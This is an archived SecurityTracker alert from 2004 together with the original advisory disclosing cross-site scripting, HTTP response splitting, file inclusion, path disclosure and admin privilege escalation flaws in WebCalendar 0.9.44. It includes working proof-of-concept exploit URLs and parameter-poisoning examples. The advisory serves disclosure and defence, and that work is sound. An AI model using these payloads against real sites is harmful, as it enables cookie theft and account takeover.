SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar Grants Administrative Access and Permits Cross-Site Scripting and HTTP Response Splitting Attacks
SecurityTracker Alert ID:  1012168
SecurityTracker URL:  http://securitytracker.com/id/1012168
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 10 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.9.44
Description:   Several vulnerabilities were reported in WebCalendar. A remote user can conduct cross-site scripting and HTTP response splitting attacks. A remote user can determine the installation path. A remote user can gain administrative access to the application.

Joxean Koret reported that the software does not properly filter HTML code from IMG tags. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WebCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javas

http://[target]/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:

http://[target]/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2

http://[target]/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"
ookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://[target]/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=&t

http://[target]/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=ja;

http://[target]/demo/includes/styles.php?FONTS=asdf}%0A--></style>&lt;script&gt;alert(document.cookie)&lt;/script&a

All global parameters are affected.

It is also reported that a remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks. The 'login.php' script is affected.

A demonstration exploit URL is provided:

http://[target]/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0a

A local user can create a file in a web-accessible directory and then load the following type of URL to cause the web server to execute the file. A demonstration exploit URL is provided:

http://[target]/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other

It is also reported that a remote user can invoke the following URL to determine the installation path:

http://[target]/demo/includes/validate.php?encoded_login=

It is also reported that a remote user can gain administrative access to the application.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WebCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

A remote user can gain administrative access to the application.

Solution:   A fix is available via CVS.
Vendor URL:  webcalendar.sourceforge.net (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vulnerabilities in WebCalendar




--------------------------------------------------------------------------- 
              Multiple Vulnerabilities in WebCalendar 
--------------------------------------------------------------------------- 
 
Author: Jose Antonio Coret (Joxean Koret) 
Date: 2004  
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
WebCalendar - Web Calendar Application 
 
WebCalendar is a PHP application used to 
maintain a calendar for a single user  
or an intranet group of users. It can also be 
configured as an event calendar. 
 
Web : http://webcalendar.sourceforge.net 
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Cross Site Scripting Vulnerabilities in various 
scripts. 
 
A1. WebCalendar check the &lt;script&gt;any&lt;/script&gt; 
format of XSS attacks but 
doesn't check <img src based attacks. To test the 
vulnerabilities you can try 
the following POCs:  
 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
 
 
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
 
 
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.c
ookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
 
 
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
 
 
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 
NOTE: Almost any GLOBAL parameter in this script 
is vulnerable 
 
 
B. HTTP Response Splitting Error 
 
B1. Due to a poor input validation in the script 
login.php HTTP Response Splitting  
attacks are possible. You can try the vulnerability 
with the following POC :  
 
http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi
 
to all 
 
 
C. Possible code execution 
 
C1. If an attacker is abble to upload a file via ftp or 
other system to the web directory 
there is a flaw that allows to execute any file in the 
web tree. To try the vulnerability 
you can try this url :  
 
http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other 
 
Note: Almost this is a full path disclosure. 
 
D. Full Path Disclosure 
 
D1. Because of a poor validation of the parameter 
enconded_login in the PHP script 
validate.php, there is a vulnerability that shows 
the full path of the script in the  
web server. 
 
http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login= 
(Full Path Disclosure) 
 
E. Admin Privileges 
 
E1. To make various actions you need to be the 
administrator of the webcalendar 
application but various scripts are vulnerable to 
Variable Poisoning attacks.  
Privilege escalation is possible using the following 
methods :  
 
 
Example 1 :  
 
You doesn't have permission:  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
But using it yes: 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
Example 2 :  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=
 
 
Example 3 :  
 
No permission -> 
http://webcalendar.sourceforge.net/demo/upcoming.php 
Permission Granted :) -> 
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y 
 
Notes 
~~~~~ 
 
The poor method that uses to protect against XSS 
attacks in the script functions.php 
is the following : 
 
// This code is a temporary hack to make the 
application work when 
// register_globals is set to Off in php.ini (the 
default setting in 
// PHP 4.2.0 and after). 
if ( ! empty ( $HTTP_GET_VARS ) ) { 
  while (list($key, $val) = 
@each($HTTP_GET_VARS)) { 
    // don't allow anything to have &lt;script&gt; in it... 
    if ( ! is_array ( $val ) ) { 
      if ( preg_match ( "/<\s*script/i", $val ) ) { 
        echo "Security violation!"; exit; 
      } 
    } 
 
Is very easy to by pass these basic security checks 
by using Unicode encoded strings,  
or using any other valid XSS attack, such as <img 
src attacks. 
 
More Notes 
~~~~~~~~~~ 
 
The developers (in special Jeff Hoover) of 
WebCalendar has been demostrated  
seriousness with the fixes and responses about 
these errors. 
 
The fix: 
~~~~~~~~ 
 
The problems has been fixed in the CVS repository. 
 
Disclaimer: 
~~~~~~~~~~~ 
 
The information in this advisory and any of its 
demonstrations is provided 
"as is" without any warranty of any kind. 
 
I am not liable for any direct or indirect damages 
caused as a result of 
using the information or demonstrations provided 
in any part of this 
advisory.  
 
--------------------------------------------------------------------------- 
 
Contact: 
~~~~~~~~ 
 
	Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
 
 
 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC